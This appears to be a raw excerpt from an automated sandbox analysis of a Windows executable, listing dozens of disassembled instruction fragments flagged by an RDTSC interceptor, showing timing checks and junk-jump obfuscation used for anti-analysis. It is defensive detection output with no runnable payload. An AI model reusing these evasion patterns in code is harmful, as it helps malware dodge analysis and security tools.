Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC403E second address: CC4044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4044 second address: CC4061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74679h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4061 second address: CC4067 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CD5BA1 second address: CD5BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CD5BA7 second address: CD5BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA483C second address: DA4840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA35BE second address: DA35CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jl 00007FFB28DE2A06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA35CC second address: DA35D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3727 second address: DA3742 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3742 second address: DA376E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FFB28B74671h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA376E second address: DA37A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28DE2A16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FFB28DE2A17h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA37A8 second address: DA37C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Ch 0x00000009 popad 0x0000000a jno 00007FFB28B74668h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA37C1 second address: DA37C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA38FB second address: DA3915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28B74670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3915 second address: DA3919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3919 second address: DA3923 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3923 second address: DA3929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3929 second address: DA3934 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FFB28B74666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3934 second address: DA393F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA393F second address: DA3943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3943 second address: DA395F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007FFB28DE2A06h 0x00000011 jp 00007FFB28DE2A06h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA395F second address: DA3972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3972 second address: DA3976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3976 second address: DA397C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA397C second address: DA3982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3982 second address: DA398C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFB28B74666h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA3AD1 second address: DA3AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA40EB second address: DA4106 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFB28B74668h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFB28B7466Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA422C second address: DA4232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA4232 second address: DA4240 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFB28B74666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA4527 second address: DA452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA452D second address: DA453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FFB28B7466Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA453A second address: DA453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA453E second address: DA4560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFB28B74677h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7483 second address: DA74D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFB28DE2A0Fh 0x0000000a popad 0x0000000b nop 0x0000000c and dl, 00000000h 0x0000000f push 00000004h 0x00000011 mov edx, 5F840100h 0x00000016 call 00007FFB28DE2A09h 0x0000001b jmp 00007FFB28DE2A14h 0x00000020 push eax 0x00000021 jne 00007FFB28DE2A14h 0x00000027 pushad 0x00000028 jng 00007FFB28DE2A06h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA74D0 second address: DA7529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007FFB28B7466Eh 0x0000000f jmp 00007FFB28B7466Ah 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 ja 00007FFB28B74679h 0x0000001d jp 00007FFB28B74673h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FFB28B74673h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7529 second address: DA7531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA7743 second address: DA777A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+12A32486h] 0x0000000e push dword ptr [ebp+12BB3252h] 0x00000014 mov edx, dword ptr [ebp+12A338F5h] 0x0000001a call 00007FFB28B74669h 0x0000001f jmp 00007FFB28B7466Eh 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA777A second address: DA777E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DA8A71 second address: DA8A83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FFB28B7466Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: DAC256 second address: DAC25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0023 second address: 70C008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFB28B74678h 0x00000009 sub esi, 43C370C8h 0x0000000f jmp 00007FFB28B7466Bh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FFB28B74671h 0x00000023 pushfd 0x00000024 jmp 00007FFB28B74670h 0x00000029 add ecx, 76D17658h 0x0000002f jmp 00007FFB28B7466Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C008F second address: 70C00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00A7 second address: 70C00BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28B7466Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00BF second address: 70C00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00C5 second address: 70C00C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C00C9 second address: 70C00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C01C1 second address: 70C020D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFB28B74678h 0x00000008 sub ax, 13B8h 0x0000000d jmp 00007FFB28B7466Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 mov esi, ebx 0x00000018 pop edx 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FFB28B74671h 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C020D second address: 70C0213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0340 second address: 70C036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFB28B7466Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C036C second address: 70C0371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C044F second address: 70C0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0467 second address: 70C046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C046B second address: 70C0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov edi, 7D6D8360h 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, 7FC984EAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0482 second address: 70C04A6 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FFB972A1C24h 0x0000000e jmp 00007FFB28DE2A0Dh 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C04A6 second address: 70C04E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007FFB28B7466Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28B74677h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C04E7 second address: 70C052A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov ebx, 223549D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+08h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FFB28DE2A19h 0x0000001a and cl, 00000036h 0x0000001d jmp 00007FFB28DE2A11h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C052A second address: 70C0590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, di 0x00000009 popad 0x0000000a mov dword ptr [esi+0Ch], eax 0x0000000d jmp 00007FFB28B74679h 0x00000012 mov eax, dword ptr [ebx+4Ch] 0x00000015 jmp 00007FFB28B7466Eh 0x0000001a mov dword ptr [esi+10h], eax 0x0000001d jmp 00007FFB28B74670h 0x00000022 mov eax, dword ptr [ebx+50h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFB28B74677h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0590 second address: 70C0595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0595 second address: 70C05BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFB28B74678h 0x00000014 mov ah, AFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05BF second address: 70C05C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05C5 second address: 70C05E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFB28B74671h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C05E3 second address: 70C06C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+18h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FFB28DE2A0Bh 0x00000014 adc esi, 34612B4Eh 0x0000001a jmp 00007FFB28DE2A19h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FFB28DE2A10h 0x00000026 adc esi, 73E80FC8h 0x0000002c jmp 00007FFB28DE2A0Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+58h] 0x00000036 jmp 00007FFB28DE2A16h 0x0000003b mov dword ptr [esi+1Ch], eax 0x0000003e pushad 0x0000003f mov ax, 2A7Dh 0x00000043 pushfd 0x00000044 jmp 00007FFB28DE2A0Ah 0x00000049 add esi, 3B775558h 0x0000004f jmp 00007FFB28DE2A0Bh 0x00000054 popfd 0x00000055 popad 0x00000056 mov eax, dword ptr [ebx+5Ch] 0x00000059 jmp 00007FFB28DE2A16h 0x0000005e mov dword ptr [esi+20h], eax 0x00000061 jmp 00007FFB28DE2A10h 0x00000066 mov eax, dword ptr [ebx+60h] 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c jmp 00007FFB28DE2A0Dh 0x00000071 movzx esi, bx 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C06C3 second address: 70C06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28B7466Eh 0x00000013 adc ax, 8478h 0x00000018 jmp 00007FFB28B7466Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f mov ecx, 21CB7B45h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C06FD second address: 70C0720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d mov ch, 72h 0x0000000f popad 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28DE2A0Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0720 second address: 70C0725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0725 second address: 70C0737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+68h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0737 second address: 70C0741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 5772AC77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0741 second address: 70C075B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C075B second address: 70C076E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C076E second address: 70C07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007FFB28DE2A0Eh 0x00000012 mov word ptr [esi+30h], ax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FFB28DE2A0Eh 0x0000001d jmp 00007FFB28DE2A15h 0x00000022 popfd 0x00000023 mov si, AB07h 0x00000027 popad 0x00000028 mov ax, word ptr [ebx+00000088h] 0x0000002f jmp 00007FFB28DE2A0Ah 0x00000034 mov word ptr [esi+32h], ax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFB28DE2A0Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C07EF second address: 70C07F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C07F5 second address: 70C084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 jmp 00007FFB28DE2A12h 0x00000016 mov dword ptr [esi+34h], eax 0x00000019 jmp 00007FFB28DE2A10h 0x0000001e mov eax, dword ptr [ebx+18h] 0x00000021 pushad 0x00000022 jmp 00007FFB28DE2A0Eh 0x00000027 mov di, ax 0x0000002a popad 0x0000002b mov dword ptr [esi+38h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov di, D2ECh 0x00000035 push edx 0x00000036 pop eax 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C084E second address: 70C0865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ax, 3B7Fh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0865 second address: 70C0885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0885 second address: 70C0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 movsx edi, cx 0x00000009 pop esi 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFB28B74673h 0x00000015 and ah, 0000005Eh 0x00000018 jmp 00007FFB28B74679h 0x0000001d popfd 0x0000001e call 00007FFB28B74670h 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esi+40h], eax 0x0000002a jmp 00007FFB28B74677h 0x0000002f lea eax, dword ptr [ebx+00000080h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FFB28B74675h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0910 second address: 70C0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
